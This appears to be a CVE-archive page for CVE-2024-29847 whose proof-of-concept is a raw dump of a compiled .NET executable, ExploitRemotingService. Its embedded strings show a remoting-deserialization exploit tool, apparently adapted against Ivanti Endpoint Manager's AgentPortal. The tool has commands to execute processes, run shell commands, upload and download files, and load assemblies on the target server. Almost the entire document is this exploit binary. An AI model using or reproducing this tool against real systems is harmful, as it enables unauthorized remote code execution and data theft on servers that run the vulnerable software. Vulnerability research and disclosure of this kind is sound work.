4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-29847
README.md
Rendering markdown...
POC / CVE-2024-29847.exe EXE
⬇ Raw GitHub ✕ Close 
MZ����@���	�!�L�!This program cannot be run in DOS mode.

$PEL$f�0�
�� �@ `���O��p�  H.text� � `.rsrc��@@.reloc��@B�HhLoy{*"}*B(&
}*0A
(�,+s'
%{o(
o)
(o*

+*{*"}*^(&
}}*0%
(�,(o+

+*0|(�
,(o,
+Ko-
�s.
o-
s/
%{%-&o0
o(
%{o1
o)
�Xo-
�i�
	-�*0{
+*�(&
}}}}	}
*0Xo2

o3
o4
�
	,(5
o6
+&�,(7
o6
+rps8
z*0�o9

8�(:
.+((+mo2

	E
)+5+>(+5o2
�g+'o9
�f+o3
�h+r1ps8
z+rcp(;
(<
o9

�:A���*0�o=

 .NET��,r�ps>
zo2
&o2
&o9
&o9
&o3
(
o4
s?
%o@

sA
	oB
u#�,2oC
�,oC
	+oD
%-&r�p	+
r�p	+	*0joE

(F
,Kr�prpr9p~T%-&~S��sG
%�T(+(+(J
(K
s8
z+*0<	sL

s?
%o@
,sM
oN
oO
oP

+	*0�
sL

sQ
s|{	-+�io}r=po�{�
	,&{o�rop{oR
oo~oS
{oT
sQ
oP
oS
{	,
~U
�.sV
(�,oW
�,oW
�*�9�
�P�
0(
(+*0(�
+*03
{
oX
(
u9�,t9z+*0{
oX
(
+*0��t(Y
oZ
r�p�vo[
r�pr�po[
r�pr�po[
rpr�po[
r#po\
rOp 	o]
rupo\
r�po[
r�po]
s?
%sM
oN

sL
{oO
rpoP
o[
*B(&
}*z(&
}}
}*0��w(Y
oZ
r-p{o[
r9p{
o^
o[
rSp{
o_
~V%-&~U��s`
%�V(+(+o[
rwp{o[
r�p{
oa
ob
o[
r�p~U
o[
*B(&
}*�{oc
oZ
{od
*z(e
}}}*0M,r�psf

+
r�psg

�5(Y
r�p$oh
oi
s
+	*05sj
%r�pok
%r�pr�pok

{�,m}{t,(l
(m

{�4(Y
r�p�$%�z(Y
�(n
�%	�o&�&�8�{,n}{o
oo
(m
{�,(Y
r�p�$%�$(Y
�(n
�%�o&�&�+{oo)
(<
*SB�9�D90I{u�
��,+$r	p�(Y
ob
r=p(p
sq
z*2rYpsr
z0(((+
+*0;(((+
os
�iot
�,oW
�*/0y(((+ou

sv
 �g�iow

+	(+oy
�iow

	�-�oz
�,oW
�*Pk0(((+o{

+*0
o|

+*0Mui�
,
o}
+3(~
,$}{�
	,}s
z+*s�
z0{s
+*0(�
(?
+*0A(<�
	,	(�
o�
o�
Yo�
(�
+*V(&
(>}*V(&
(?}*B(&
}*0Nr�po�
r�po�
sL

sQ
o�
{oS
r�poP
o[
*z(e
}}}*0(�
(Ps�

+*0(�
(Pr�p
+*0(�
(Pr�p
+*0(�
(P
+*0(�
(P�
+*0(�
(P{�i
+*0`(�
(Pr�pr9p{~X%-&~W��s�
%�X(+(+(J
(�
(<
{
+*0(�
(Pr�p
+*0(�
(Pr�p
+*0(�
(P
+*0-(�
(P}�G(Y
(�
tG
+*br
po^
(�
(<
*0c (�
(P{�
,#r$p(<
�(Y
rFp(�
+%rXp{o^
(�
(<
{+*0(�
(Pr~p
+*0(�
(Ps&

+*0(�
(Pr~p
+*0(�
(P}{
+*^(�
}}*0:!�,r�ps�
zo�
o�

{s�
o�
o)
ob
�h(Y
o�
r�po�

	oZ
+�{se�X�i�-���,r�p�o[
rp�	(Y
o�
r$p�i(Y
o�
r.p�i(Y
o�
rHp�i(Y
o�
r\p�i(Y
o�
rppo]
*�{o^
{oa
{o)
{o�
(W*0{o^

+*b(�
}}*0{"{t(
r�po]
r�p{ob
o[
{o�
o�
{s�
o�
r.po)
o[
r�p(�
oZ
*0�#~/,~)+
9�s�
r�p��o�
rp4�Qo)
o�
s�
%~!~"so�
s�
%~o0
so�

s�
~1�,~5o�
+o�
~o�
r4p(�
-r<p(�
-.8�rDp~ �ho�
	s�
8�rNpr<po�
rXprjpo�
rpp~(o�
r�p~)��o�
r�pr�po�
	s�
+r�p~o�
(�
s8
z~)(�
*0}$s�

~o0
~o�
o�
o�
~),Cs�

~%,~%~&~'s�
+(�
	~U
~4o�
	+*0l%~6(�
-~6+r�p
~6(�
-~o0
+~oo
��%/�o�
�~4s�
o�

+	*0q&~-(�
�
,~-s�
+M~o�
r4p(�
,	(h+,~o�
r<p(�

	,	(i+r�ps8
z*0F's�
}o}p g+� �!~ �"r	p�(�3(Y
o�
o�
o�
�.�*�+�,~U
�-s�
%r<	prN	p~Z%-&~Y��s�
%�Zo�
&%rt	pr�	p(	+~4�Q(;
~[%-&~Y��s�
%�[o�
&%r
pr,
p~\%-&~Y��s�
%�\o�
&%r|
pr�
p~]%-&~Y��s�
%�]o�
&%r�
prp~^%-&~Y��s�
%�^o�
&%rtpr�p~_%-&~Y��s�
%�_o�
&%r�pr�p~`%-&~Y��s�
%�`o�
&%r(pr4p~a%-&~Y��s�
%�ao�
&%rvpr�p~b%-&~Y��s�
%�bo�
&%r�pr�p~c%-&~Y��s�
%�co�
&%r>
prT
p~d%-&~Y��s�
%�do�
&%r�
pr�
p~e%-&~Y��s�
%�eo�
&%r�
prp��s�
o�
&%rFprTp~f%-&~Y��s�
%�fo�
&%r�pr�p~g%-&~Y��s�
%�go�
&%ripr}p~h%-&~Y��s�
%�ho�
&%r�prp(
+~5�R(;
~i%-&~Y��s�
%�io�
&%r�pr�p~j%-&~Y��s�
%�jo�
&%r
prp~k%-&~Y��s�
%�ko�
&%rprp~l%-&~Y��s�
%�lo�
&%r�pr�p~m%-&~Y��s�
%�mo�
&%ryp��s�
o�
&o�
{o
	,(�
s�
o�
&o�
�,r�ps8
zo�
s�
�o�
�#�$~$o�
�o�
(�
}p�{p,
(m++*�u90r�p�(Y
(�
(J

+*�r�p(�
(�
o�
r�p(�
*0joE

(F
,Kr�prpr9p~n%-&~Y��sG
%�n(+(+(J
(K
s8
z+*0B(Ё(Y
r�p�$(n
�$%�(Y
�o�
~*sV
+*01)~r�p~.(�
s�

o)
(�
t3+*0�*
~1
	,,~oo
�,(Y
r�p(�
(+o+
�3(Y
~2s~3(�
,~,+9~,,r�po#		o�
�3~.(r�3(Y
ob
o�
~3o�
(�
(�
o&�

o)
(<
��,>rpr!po�
o�
rpr!po�
(�
o$�&�И(Y
ob
o�
�%~.�(�
r-po(�
(<
�&�(p

o)
&
�o)
(<
�+*4��9�76=H���90�+
(�

݄&�3(Y
o�
o�
(�
(�
o�
(�
o�
(�
o�
(�
rp(�
(�

	s�
o�
�
,oW
�	(�

�+*p~
�0�,~.(r�3(Y
ob
o�
~o�
r<p(�

	9�(po)
&�'&�~oo
Ж(Y
r5p(
+(n(+o+
rMp(�
��(�
(�

~oo
З(Y
r]p�$%�i(Y
�%�(Y
�(n�%�%o�
(�
�o&+	o�

~oo
(+(+o+o�
�i%ryp~.(�
�o�
o�
s�
o�
�&�(p+*FX^_p0 -~0
,
(q+
(s+*0>.~0,s+&sD
~/
	,
s@+
(m
+*0+o�
o�

(F
,r�psq
z+*0n/
~0�,5~oo
П(Y
r�p(v(+o+
�&�(�
,(�

r�p(�
o�

+	*.>0�0~#
(� �^x`5? W�T5 �N�*;�+ W�T;�8B ��1V.u+ �^x`;�8( ��k5 �ri.h+ ��k;�8 \J�.+ �W��.8�r#p(�
:�8�r-p(�
:g8�r5p(�
:�8�r;p(�
:^8�rCp(�
:�8�rKp(�
:�8qrSp(�
:;8\r]p(�
:98G
~$o�
�,.~$o�
ripo�
,
~$o�
~$o�
,~$o�
�+,(�
rupo�
+d~$o�
~$o�
0~U
+~$o�
o�
	r�p	o�
�h(�
	

,
	o�
8z~$o�
��,(�
rpo�
+~$o�
o�
(�
8.~$o�
��

,(�
rmpo�
8�~$o�
o�
r�po�
(�
o�
+!�r�po�
(�
X�i2�o�
+-�r�po�
o�
��(�
X�i2�8Y~$o�
��,(�
rpo�
+-~$o�
(�
~$o�
o)
o�
8�~$o�
��,(�
rpo�
+(~$o�
o�
~$o�
(�
8�~$o�
�,(�
r{po�
+@~$o�
(�
~$(+(+r�po�
�h(�
+=r�po�
(�
+*r�po�
(�
+(�
rp~#o�
+*0\1(k
9E~�js
�us
~+~-(�
�s~#r/po
9�~$o�
��
	,(�
r7po�
+b~$(+(
,
(�
+(�
ou9�,
r�p(�
(
+R(g~*-
~0�+

,"(w�*r�p~*�h(�
(t		(x�(
�++*A/>9"(&
*6�4�5*B(&
}7*0T{7 .NETo�
{7o
{7o
{7o
{7o
{7o
*>{7o
*~{7o
(�(�*�{7o
{7-+�o
*^{7o
(�*�{7o
{7o
o)
(�*r{7o
{7o
*�{7o
{7o
(�*07(7
o	

{7o
{7�io
{7oS
*0.2,) ŝ�
+o

a �Z
Xo�
/+�*.s��S*ob
*.s��U*o
*.s��W*o)
*.s��Y**��)*:4(+&*2(

� *�!*2(

�"*�(*0@3�%~%\(+
,(~%��%\�o�
��'��%*�&*2(

�***��/*�6*�.**��0*B�%�1�0*B�%�2�0*:5(+&**��+**��,*�3*�-*.�}o*.�}p*BSJBv4.0.30319l$!#~�!� #Strings`B( #US�b#GUID�bp#BlobW�	�3�p��$3	�
�IE
I��i =�=�=,
=�=�=7=*�*k=R^�/#;�I}����;�;�;�;;�
;
�/L/���//=���
 ��^<�
/
/���/� � S �=�/se�/�/�/H/�	/Sd:�	r�E=�e&�/
����]���j*&/����K<0<<< e�*h<�=O	=="=y=�=f'/�=�P�h;�;j;
m�
�� 
 ���x�="&/���/�/a/w/
�/3G�/G/�
/�/�/
x�
���O=�=�S*�<� �/&�;/&@�<�=	�z�	/�/���*�/�/�/�/Oe��sE;
��
��
�� ./����y �
[�
8�
?�
�/�/���/L����d�����/"./�=�/4/�/b>~A�~A~~A
 �~A a~A M~A�~� ~A<?~�D ~}V 
~Ae~Ag�VA7|Z
V�8� V�<��V�?�/V�G�-V�M��V�P�kAS�!!AS�!!AU�!!AW�!!AY��Ao�!��!!������!��!��!��!����!�!?�!����!��!A�!���Q�e�������?�G����%�������������	S�m	�
�����H�Qv	6���H��<���1!���	V�	V��	V� 	�	V��		V��		�	V��
	V�G
	V��
	V�R
	V��
	V�s
	V��

	�	V��	V��	V��
	V�j	V��	�	V�	V�	�	V��	V�t	6? 	C$	6?/	�3	6?@	�D	6?M	�Q	-Q	�Q	&Q	�Q	�Q	qQ	�Q	�Q	CQ	Q	�Q	Q	EQ	�Q	Q	�Q	�Q	Q	"Q	f$	��P �	5Y	X �	>�a ��t ���� �	5^	� �	>�� ��t� ���	 !���
�!�zc	�!��h	�!���	T"���	0#�a�	$��	|$�x�	�$���	�%���	�%�&�	&�&�	X&���	!�&���$a'���	&r'���	'�'���*[(���	,l(���-�(���	/�(�Z�	2)��	4l*���	5�*��E5�*��M7�*���8�*�H R:�*��r;P+�|y=�+��>�*��	�?�*���?,� ?0,��&A�,��+B�,�|1B�,�8C�,�c
?D�,��
FE�,�NMF�,�1TG�,��[H�,��bI�,��iJ�,�fpK�,�_wL�,��~M�,�2�N�,��	�O�,���P�,�v
�Q�� �	S�� ��	U�,��
W�,��
X!-���	Y7-��
ZM-��I[`-���\�-���	^�-�	�
a.�
a$.�	"
bH.�	��ch.�	�'
c�.�	��c�.�	�'
c /�

cD/�	"
dh/�	��e�/�	d,
e�/�2
e�/�	+8
fL0�	��fp0�	[f�0�	��f�0�	z�f�0��=
f�0��D
hB2���n�,�W
p�,��]
p�,�zp�,��c
p�,�s
u�,�9
�u�,�7y
u�,�7�
w�,���
x�,��
�
z|2���z�,�
�z�2���
z�2���|<3�%�
~�4���
~x5���
~�5���
~p6���
~�;���
�;���
$<��	��<���
��<�r�
�,=��
�,?�NX��?�4�
��A�`�
��A�g�
�B�� �
�PB���
��B���
��G���
�I���
I���
�I���
�,I���
��I�3��I����I�B��I�o��I����"J���?J�X�dJ����J�	��J���
�I����J�M��J���
�I���K���
K���
�I���K���K���
�I���*K���5K�7�DK���QK�0�YK���fK���pK�{��K����K���K�M��K���K���K���K�P�L���L��(L���3L���>L�)�FL�-��J�p�I���NL�q�ZL���
�~��
�����������
�	���	��Yw�Yw�Yw�����L�������LYU ����l�YY�YY�� ����������������K
���%��������L�p�p�w���	D�
������#+
MM+
M�����
�
�	� 
����YL���	�h��h
i)	�
r_��
�
������������������������E]������	�
	


��	���
)�1�9�A�I�Q�Y�a�i�q�y�����)�i4 i�&q�+q�1q,8qw
?q�
FqbMqETq�[q�bq�iqzpqswq
~qF�q�	�q��q�
�������������������������	��
���K�!!�!�)�&1��I`Q�	%�>Y�	�	TB�I	�
O�U�
[!$g�_ |��y��y��I��I(����	��	�
���1��C�1�I�I� ��l$�@!MXI�
aI�
hI�
nI�
t����z,���9
�!	���
�A��a�����!����
�����������!$��2�I(������#��/�qI4��uVy�^4su4�����4������ �����������<	�I^�I��x�IK	I�1���.�<�D��I`	�!$-���!�C�4	I��OI�W��
^I�
j��s��a!�
���)�����>�����>������	�I_ �)��1��9���������t��������I���w�I� I.������8I����T���_�y�w�Q����y�\��\����\|��$���	%���-����i��I(����	���� "Ie�	������3��	�I]8�U�	�>�zX�z_�"i��p��w�\	3��}�"��������>XIk �����)��	��{�D�!� ��!��_ �����	�Q�I4=\�[���	��E�j��U��M�H R�xY�����`�^g��	k��r�|y�by�^�����	������	h��$��I4�y'����	�1��1��1�!pyI��Y�
�t�Aw�y\�P����������������� �$�(�,�0�8�<�D�H� {\.p.y.�.#�.+�.3�.;�.C�.K�.S�.[�.c�.k.s@{\A{\A�a�{\�{\��a�{\C[jc[j�{\��\�{\�{\{\#{\C{\��\�\d�\ +\D�\�����*_��!'/KO���7��������'4z��0C���G�������
B#B(�-�2�8�<�8�<�AhE/K�P	T�P�P@X.^=
d�
jh	P	
d
E	HI
JKNOQRSTUY!]#^%b'c)d+R%T'V)X+Z-\/^1`3b5d7f9h;j=l?nApCrEtGvIL�,5�O�eX��y{��~��/d����
x/��


'�?�������������>>�q��m�s�)&-��&���&�&����m�s<>9__28_10<ProcessArgs>b__28_10<>9__28_20<ProcessArgs>b__28_20<>9__11_0<GetStaticMethod>b__11_0<>9__31_0<GetStaticMethod>b__31_0<>9__4_0<GetObjectData>b__4_0<>9__16_0<get_Args>b__16_0<>9__28_0<ProcessArgs>b__28_0<>c__DisplayClass28_0<>9__28_11<ProcessArgs>b__28_11<ProcessArgs>b__21<>9__28_1<ProcessArgs>b__28_1Func`1IEnumerable`1Action`1List`1<ProcessArgs>b__12ReadUInt32System.IConvertible.ToUInt32ReadInt32System.IConvertible.ToInt32<>9__28_2<ProcessArgs>b__28_2Func`2Dictionary`2<>9__28_13<ProcessArgs>b__28_13<>9__28_3<ProcessArgs>b__28_3<>9__28_14<ProcessArgs>b__28_14System.IConvertible.ToUInt64System.IConvertible.ToInt64<>9__28_4<ProcessArgs>b__28_4Func`4<>9__28_15<ProcessArgs>b__28_15<>9__28_5<ProcessArgs>b__28_5<>9__28_16<ProcessArgs>b__28_16ReadUInt16System.IConvertible.ToUInt16System.IConvertible.ToInt16Uint16<>9__28_6<ProcessArgs>b__28_6<>9__28_17<ProcessArgs>b__28_17<>9__28_7<ProcessArgs>b__28_7<>9__28_18<ProcessArgs>b__28_18get_UTF8<>9__28_8<ProcessArgs>b__28_8Utf8<>9__28_19<ProcessArgs>b__28_19<>9<>9__28_9<ProcessArgs>b__28_9<Module><PrivateImplementationDetails>System.IOThrowExceptionForHRTvalue__System.Data_marshalledDataremoteChannelDataGetChannelDatachannelDataGetObjectDatadatadnlibmscorlib_mb<>cppbcSystem.Collections.GenericSystem.Runtime.Remoting.Channels.Ipcget_IdOpenReadLoadAddNotChunkedIsDefinedReservedVoidNewGuid<Next>k__BackingFieldGetField_cmdExecuteCommandRunCommandUriKindMakeGenericMethodGetStaticMethodFakeMethodGetGetMethodGetCurrentMethod_method_sendmethod_passwordReplaceIsNullOrWhiteSpaceTraceExploitRemotingServiceGetCreateInstanceSystem.IConvertible.GetTypeCodeSystem.Collections.IEqualityComparer.GetHashCodeTcpStatusCodeFileModeget_UnicodeIMessageget_MessageIMethodMessageFakeMessageIMethodCallMessageIMethodReturnMessageAddRangeRemoveRangeCredentialCacheTakeInvoke_fakeTableEnumerableIDisposableHashtableISerializableIConvertibleWritePreambleSystem.IConvertible.ToDoubleget_MethodHandleRuntimeMethodHandleRuntimeTypeHandleGetTypeFromHandleSystem.IConvertible.ToSingleReadFileWriteFileConsoleFormatterAssemblyStyleget_Nameset_Nameget_MethodNameGetFileNameget_TypeNameset_FullTypeNameremoteNameGetInArgNameGetArgNameget_FullNameheaderNameGetNameGetDisplayNameset_AssemblyNameGetDirectoryName_ipcname_remotenameGetUsername_usernameget_SchemeSystem.IConvertible.ToDateTimeSystem.Runtime.Remoting.Lifetimeset_CommandLineWriteLineCombineget_ReflectedTypeFakeTyperemoteTypeattributeTypeget_DeclaringTypeconversionTypeOperationTypeoperationTypeSystem.IConvertible.ToTypeget_MemberTypeget_ParameterTypeGetTypeSetTypeContentTypecontentTypetypeSystem.CoreIChannelDataStore_secureget_MethodSignaturesignaturecultureget_MethodBaseILease_lease_useleaseStatusPhrasestatusPhraseDisposeTryParseDebuggerBrowsableStateWriteremoteMTAThreadAttributeCompilerGeneratedAttributeGuidAttributeDebuggableAttributeDebuggerBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeParamArrayAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeSystem.IConvertible.ToSByteReadByteSystem.IConvertible.ToByteAddValueget_ReturnValueheaderValueSetValuevalueExploitRemotingService.exeSerializeDeserializeAssemblyDef_useObjRefFakeComObjRefStringEncodingSystem.Runtime.Remoting.MessagingSystem.Runtime.VersioningFromBase64StringUTF8StringWriteCountedStringSystem.IConvertible.ToStringReadHeaderStringGetStringSubstringSystem.Runtime.RemotingGetInArgGetArgdebugComputeStringHashset_Pathget_AbsolutePathget_LocalPath_output_pathget_LengthcontentLengthmiget_UriGetObjectUriRequestUrirequestUri_null_uri_capturedobjretobjpUnkCreateSinkIServerChannelSinkIClientChannelSinkDataSetMarshalCreateRemoteClassSerialNetworkCredentialSystem.IConvertible.ToDecimalSystem.Security.PrincipalIChannelIpcChannelCustomChannelTcpChannelRegisterChannel_channelTokenImpersonationLevel_tokenImpersonationLevelProtectionLevelset_TypeFilterLevel_typeFilterLevelTraceMethodCallMakeCallSystem.Configuration.Installole32.dllExploitRemotingService.RemotingProtocolurlBindIpcStreamBindStreamFileStreamNegotiateStreamNetworkStreamBindTcpStreamGetStreamNamedPipeClientStreamMemoryStream_bind_streamProgramget_Itemset_ItemOperatingSystem_usecomLoadFromCustomGenerateAndLoadDynamicFakeAsmasmargNumEnumSystem.IConvertible.ToBooleanHeaderTokenOpenMain_domainJoinGetOSVersionget_Versionset_VersionDetectMajorVersion_versionget_LocationSystem.GlobalizationSystem.Runtime.SerializationSystem.ReflectionICollectionTraceListenerCollectionCloseConnectionPipeDirectionget_ExceptionInvalidDataExceptionNotImplementedExceptionRemotingExceptionArgumentNullExceptionInvalidOperationExceptionArgumentExceptionContentDistributionStringComparisonFieldInfoMethodInfoGetFileInfoCultureInfoFileSystemInfoGetSerializationInfoMemberInfoParameterInfoDirectoryInfoPropertyInfoinfoSystem.Runtime.Remoting.Channels.TcpSkipPrintHelpshowhelpSystem.LinqSystem.IConvertible.ToCharWriteEndHeaderWriteStatusCodeHeaderWriteContentTypeHeaderWriteStatusPhraseHeaderWriteRequestUriHeaderWriteCustomHeaderWriteCloseConnectionHeaderBinaryReaderreaderIServerChannelSinkProviderChannelUriFixingServerChannelSinkProviderIClientChannelSinkProviderChannelUriFixingClientChannelSinkProviderBinaryServerFormatterSinkProviderBinaryClientFormatterSinkProviderIFormatProviderproviderUriBuilderIChannelSenderBinderbinderParameterModifierIMonikerCreateObjrefMonikerppMonikerAssemblyInstallerConsoleTraceListenerSerializableWrapperMethodCallWrapperIEqualityComparer_ser_useserdnlib.DotNet.WriterTcpMessageWriterTextWriterBinaryWriterwriterSerializableRegisterBinaryFormatter_verIChannelReceiverSendRequestToServerSetupServer_ipcserver_installdir_autodirget_Majorget_ErrorCommandErrorisErrorISponsorTypeDelegatorActivator.ctor.cctorISurrogateSelectorset_SurrogateSelectorRemotingSurrogateSelectorinvokeAttrSystem.DiagnosticsRemotingServicesChannelServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesGetDirectoriesget_PropertiesGetFilesGetEnumNamesGetNamesSystem.IO.PipesargTypesSystem.Runtime.InteropServices.ComTypesMemberTypesget_AttributesMethodAttributesMethodImplAttributesGetCustomAttributesReadBytesReadAllBytesWriteAllBytesGetBytesBindingFlagsGetMethodImplementationFlagsget_Argsget_InArgsget_HasVarArgsProcessArgs_args_cmdargsget_ChannelUrisget_DefaultNetworkCredentialsSystem.Collections.IEqualityComparer.EqualsSystem.Runtime.Remoting.ChannelsContainsSystem.CollectionsNDesk.OptionsPipeOptionsModuleCreationOptionsModuleWriterOptionsWriteOptionDescriptionsget_CharsReadHeadersEndHeadersget_ListenersGetParametersparametersSystem.Runtime.Serialization.FormattersreflectedClassIRemoteClassCreateRemoteClassGetExistingRemoteClassSerializerRemoteClassFileAccessSuccessRunProcessprocessSystem.Net.SocketsGetGenericArgumentsgenericArgumentscontentsget_ExistsFileExistsRemoveAt_tConcatHeaderDataFormatSerializationFormatset_AssemblyFormatGetMessageObjectSerializeObjectMarshalByRefObjectMarshalObjectGetIUnknownForObjectGetObject_send_object_get_message_objectSelectConnectSystem.Netdnlib.DotNetDataSetOptionSetop_ImplicitSplitCreateRemoteClassExploitinheritWaitForExitParseResultTcpClientAuthenticateAsClientEnvironmentget_Countget_ArgCountget_InArgCountConvertget_Portset_Port_publicPort_portCastSendRequestOneWayRequestget_Hostset_Host_publicHostFirstget_Outget_Nextset_NextSystem.TextStreamingContextget_LogicalCallContextset_UseNewContextcontextvMakeCallNoThrowindexIBindCtxCreateBindCtxToArray_one_wayget_AssemblyExecuteAssemblyGetExecutingAssemblyReplySystem.Runtime.Serialization.Formatters.BinaryIDictionaryGetDirectorydirectoryop_Equalityop_InequalityHandleInheritabilitySystem.Net.SecurityIsNullOrEmptyGetPropertyIsTransparentProxy/Invalid string encoding1Unknown header data typeHeader: {0}={1}'Invalid magic value	void=Error, invalid return message.+Could not get method  with types ,1application/octet-stream__RequestUri-DataSet.RemotingFormat'DataSet.DataSetName#DataSet.NamespaceDataSet.Prefix+DataSet.CaseSensitive%DataSet.LocaleLCID5DataSet.EnforceConstraints5DataSet.ExtendedProperties)DataSet.Tables.Count!DataSet.Tables_0__Uri__MethodName#__MethodSignature
__Args__TypeName__CallContext.FullPathaDummyRegisterCreateObjRef3Couldn't get instance of  from server.mSpecify --installdir or --autodir parameters to enable��System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aGSystem.EnterpriseServices.ComObjRef
bufferUnknown!Send Args: ({0})Calling: {0}!Sending ToStringToString%Sending {0} method
badger	info_System.Reflection.MemberInfoSerializationHolderDUMMY!GenericArguments	NameAssemblyNameClassNameSignatureMemberTypeUnityType	Data?System.UnitySerializationHolderincludeVersions/tokenimpersonationleveltcpipc	port	namepriority20portName
secureauthorizedGroupeveryone-Unknown URI scheme {0}+Could not bind streamremotingexploits|secure%Enable secure mode1tokenimpersonationlevel=uTokenImpersonationLevel in secure mode: {0} (default: {1})p|port=OSpecify the local TCP port to listen onpublichost=_Specify the public host for reverse connectionspublicport=gSpecify the public TCP port for reverse connections
i|ipc=WSpecify listening pipe name for IPC channeluser=ASpecify username for secure modepass=ASpecify password for secure mode	ver=SSpecify version number for remote, 2 or 4
usecom[Use DCOM backchannel instead of .NET remotingipcserver==Connect to a remote IPC serverremname=USpecify the remote object name to registerv|verbose7Enable verbose debug output
useser��Uses old serialization tricks, only works on full type filter servicesuseleasesUses new serialization tricks by abusing lease mechanism.useobjrefuUses new serialization tricks by abusing ObjRef mechanism.!typefilterlevel=��TypeFilterLevel for the BinaryFormatter/SoapFormatter: {0} (default: {1})nulluriODon't send the URI header to the serverautodir��When useser is specified try and automatically work out the installdir parameter from the server's current directory.installdir=��Specify the install directory of the service executable to enable full support with useserpath=��Specify an output path to write the request data rather than to a channel.h|?|help=Must specify a URI and command, ��ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URI are as follows:
tcp://host:port/ObjName   - TCP connection on host and portname
ipc://channel/ObjName     - Named pipe channel

Options:
��
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd  cmdline                  : Execute a command line process and display stdout
put  localfile remotefile     : Upload a file to the hosting server
get  remotefile localfile     : Download a file from the hosting server
ls   remotedir                : List a remote directory
run  file [args]              : Upload and execute an assembly, calls entry point
user                          : Print the current username
ver                           : Print the OS version
raw base64_object|file        : Send a raw serialized object to the service.
CreateInstance/3InitializeLifetimeService	.dll.aspx{0}GetTempPath{0}.dllWriteAllBytes
/name=+Invalid property nameVersion_Error, couldn't detect version, using host: {0}	execcmdlsputgetrun	userosver-waitoMust specify at least 1 or two options for exec command7Received new process id {0}OMust specify 1 argument for cmd commandMMust specify 1 argument for ls command+Listing {0} directory<DIR> {0}!{0} - Length {1}]Must specify localfile and remotefile argumentOMust specify an assembly file to uploadResult: {0}User: {0}OS: {0}'Unknown command {0}raw��Must specify base64 encoded string or a file containing the raw data.+[!] Remote Exception:7Detected version {0} serverbG3*��G�x�VP�?%      M   �� �� �� �� �� �� �� �� 	�� 
�� �� �� 
�� ���� ���� ��	 ����UU  UYaa aem i  mm	   �� 	 
	������ 	 ��  u �� }} ���1�5����}}	���� ������
��
��
���� �� u 	����8u���� uqu 
y}
 �������� ��    ��������
����
�� ��	 ����
����	 ���1 ������ ��������
 ������
������
�� ������ ���� ���� ����

 ��   
� �� ���� 	��}���
���} ���%�� �m �%  �} ���� �� �����%��	��M�Q��U	 �� ] E �I
 �E]�U�Yu�]�au �! �a
 �a�)�E	�eu  �1�5�E�9u
 ����h�i������
 �i��
�E
�I �i�� �����= �E��  �I ���Q �Q}	 ����m�� m��#���� �m����������

�� ���m�q���m�m	�q�e�i �i�m �i�i �� u�m�m�������u�q
�u  ���( �y ���}
�}	�}�}�}0	������������ �� ��  �� �� �� 
    ��
���� ��  	 	
��
�z\V4�P�cx��y��?_�
:lSpecify --installdir or --autodir parameters to enableE]mquy}}���������E�I��<@DHLPX
����\������`��d�� E ] m mquy}������}����  
0} }  } ��	 ��0�	�  �    �} } } �����!�� �) �- �1�5�9 �= ��  �� �! ��u�i}������}}���� �� < 	 �� ���� (E(](m(�((((�(}(((�)(�=(��(�!TWrapNonExceptionThrowsExploitRemotingServiceCopyright ©  2013)$1850b9bb-4a23-4d74-96b8-58f2746745661.0.0.0I.NETFramework,Version=v4.8TFrameworkDisplayName.NET Framework 4.8$f ����RSDSi�_{��BN��d��L�D:\workspaces\workspace-new-zdi\zdi-daily\Ivanti\Ivanti-Endpoint-Manager-EPM\pocs\AgentPortal-RCE\ExploitRemotingService-master-32bit\ExploitRemotingService-master-32bit\ExploitRemotingService-master\ExploitRemotingService\obj\x86\Debug\ExploitRemotingService.pdbԼ� �_CorExeMainmscoree.dll�% @ �P�8��h�����4VS_VERSION_INFO��?DVarFileInfo$Translation��StringFileInfo�000004b0Comments"CompanyNameVFileDescriptionExploitRemotingService0FileVersion1.0.0.0VInternalNameExploitRemotingService.exeHLegalCopyrightCopyright �  2013*LegalTrademarks^OriginalFilenameExploitRemotingService.exeNProductNameExploitRemotingService4ProductVersion1.0.0.08Assembly Version1.0.0.0,��<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>�=